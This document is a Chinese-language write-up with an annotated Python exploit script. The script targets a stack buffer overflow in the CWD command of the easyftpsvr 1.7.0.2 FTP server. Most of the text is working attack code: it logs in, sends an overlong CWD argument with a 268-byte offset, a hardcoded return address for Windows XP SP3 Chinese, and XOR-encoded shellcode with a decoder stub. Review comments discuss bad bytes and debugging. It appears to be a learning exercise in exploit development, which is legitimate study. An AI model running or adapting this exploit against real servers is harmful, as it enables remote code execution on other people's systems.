目标程序是一个 FTP 服务端（easyftpsvr 1.7.0.2）。
先抓包分析登录过程（USER / PASS 两步），登录成功后再发送超长的 'CWD XXXXXX' 参数：参数的第 268 字节之后的 4 字节会覆盖保存的返回地址，从而造成栈溢出。
前提是熟悉 FTP 命令的交互顺序。
程序对输入字符也有检测（存在坏字符）；脚本里的 shellcode 采用了 XOR 0x11 编码并自带解码桩，可能就是为了绕过这一点。
目前还不清楚为什么弹框没有显示文字。审阅备注：编码后的 shellcode 中仍含有 3 个 0x0d（CR）字节，而 CWD 参数是作为一行 FTP 命令发送的，服务端的行解析可能会剥离或改写这些字节；建议用调试器核对落入栈中的数据是否与发送的字节逐一相同，再排查弹框文字的问题。
测试环境：Windows XP SP3 中文版，目标软件 easyftpsvr-1.7.0.2。
注意：脚本中硬编码的返回地址 0x7D5F6FA0（pop ecx）只在这个环境下有效，换其他系统或语言版本需要重新定位该地址。
import socket,sys
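# --- payload layout, recovered from the original script and its notes ---------
EIP_OFFSET = 268                 # CWD argument bytes consumed before the saved return address
RET_ADDR = b'\xa0\x6f\x5f\x7d'   # 0x7D5F6FA0 = "pop ecx" per the original note; XP SP3 Chinese only
DECODE_STOP = b'\x81'            # 0x90 ^ 0x11: the encoded byte at which the decoder loop ends

# Two leading bytes kept verbatim from the original.  The original does not
# explain them (NOTE(review): alignment, or consumed by the "pop ecx" gadget?
# -- confirm in a debugger before changing).
LEADER = b'\x50\x20'

# GetPC + XOR decoder, exactly 27 bytes from the fldz to the jne.  The
# `add eax, 0x1b` relies on that length: eax ends up at the first body byte.
DECODER_STUB = (
    b'\xD9\xEE'                  # fldz
    b'\xD9\x74\x24\xF4'          # fnstenv [esp-0xc] -> FPU last-instruction pointer (the fldz) at [esp]
    b'\x58'                      # pop eax           -> eax = address of fldz
    b'\x83\xC0\x1b'              # add eax, 0x1b     -> eax = start of encoded body
    b'\x33\xC9'                  # xor ecx, ecx
    b'\x8A\x1C\x08'              # loop: mov bl, [eax+ecx]
    b'\x80\xF3\x11'              #       xor bl, 0x11
    b'\x88\x1C\x08'              #       mov [eax+ecx], bl
    b'\x41'                      #       inc ecx
    b'\x80\xFB\x90'              #       cmp bl, 0x90   ; stop once a decoded byte is 0x90
    b'\x75\xF1'                  #       jne loop
)

# Body XORed with 0x11.  Its last byte must be 0x81 (0x90 ^ 0x11) and no
# earlier byte may be 0x81, otherwise the decoder stops early.  Note that it
# still contains 0x0d (CR) three times -- see build_payload().
ENCODED_BODY = (
    b'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
    b'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
    b'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
    b'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
    b'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
    b'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
    b'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
    b'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
    b'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
    b'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
    b'\x42\xee\x46\xed\x42\xee\x46\xe9\x81'
)

ENCODED_SHELLCODE = LEADER + DECODER_STUB + ENCODED_BODY   # 198 bytes, as the original noted


def build_payload():
    """Return the CWD argument: shellcode, 'a' padding up to EIP_OFFSET, then RET_ADDR.

    The padding is computed from the real shellcode length instead of the
    hard-coded 268-198, so swapping in a different (shorter) shellcode keeps
    the return-address offset correct.

    Returns:
        bytes of length EIP_OFFSET + 4, without the 'CWD ' prefix or CRLF.

    Raises:
        ValueError: if the shellcode does not fit in EIP_OFFSET bytes, or the
            encoded body would not stop the decoder exactly at its last byte.
    """
    if len(ENCODED_SHELLCODE) > EIP_OFFSET:
        raise ValueError('shellcode (%d bytes) exceeds EIP offset %d'
                         % (len(ENCODED_SHELLCODE), EIP_OFFSET))
    if ENCODED_BODY.find(DECODE_STOP) != len(ENCODED_BODY) - 1:
        raise ValueError('encoded body must end with 0x81 and contain it only once')
    # NOTE(review): the argument travels inside an FTP command line.  Bytes
    # such as 0x0d/0x0a/0x00 may be stripped or rewritten by the server's line
    # parser; the body above contains 0x0d three times.  The original author's
    # "popup shows no text" symptom is worth checking against that first.
    padding = b'a' * (EIP_OFFSET - len(ENCODED_SHELLCODE))
    return ENCODED_SHELLCODE + padding + RET_ADDR


def ftp_test(ip, port, user='anonymous', password='anonymous', timeout=10.0):
    """Log in to the target FTP server and send the overlong CWD argument.

    Sequence (unchanged from the original): read banner, USER, PASS, then
    'CWD ' + build_payload() + CRLF.  Every server reply is printed.  The
    outcome is judged only by what the socket does after the CWD:
      * socket error / reset      -> prints "ok"     (process most likely died or was hijacked)
      * a normal reply            -> prints "failed" (server survived the CWD)
      * orderly close, no reply   -> reported as such (ambiguous)
      * nothing within `timeout`  -> reported as such (hung, or shellcode still running)

    Args:
        ip: target host.
        port: target TCP port (the original uses 21).
        user, password: FTP credentials; defaults reproduce the original anonymous login.
        timeout: socket timeout in seconds; None blocks forever like the original.

    Side effects: prints to stdout; calls sys.exit(1) if the TCP connect fails
    (the original exited with status 0, which misreported the failure).  The
    socket is always closed on the way out.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if timeout is not None:
        sock.settimeout(timeout)
    try:
        try:
            sock.connect((ip, port))
        except socket.error as exc:
            print("[!] Connection failed! (%s)" % exc)
            sys.exit(1)
        print("[+] Connected!")

        print(sock.recv(1024))                                   # banner
        sock.sendall(b'USER ' + user.encode('latin-1') + b'\r\n')
        print(sock.recv(1024))
        sock.sendall(b'PASS ' + password.encode('latin-1') + b'\r\n')
        print(sock.recv(1024))

        print("[+] Sending buffer")
        sock.sendall(b'CWD ' + build_payload() + b'\r\n')
        try:
            reply = sock.recv(1024)
        except socket.timeout:                                   # must precede socket.error (subclass on py3)
            print("no reply within %s s (hung, or shellcode still running?)" % timeout)
        except socket.error as exc:
            print("ok (%s)" % exc)                               # reset/abort: the process most likely died
        else:
            if reply:
                print(reply)
                print("failed")                                  # server answered normally
            else:
                print("connection closed without a reply")
    finally:
        sock.close()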
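if __name__ == '__main__':
    # Usage: python <script> [target_ip] [port]
    # Defaults reproduce the original hard-coded run against the loopback
    # address on port 21.
    target_ip = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 21
    ftp_test(target_ip, target_port)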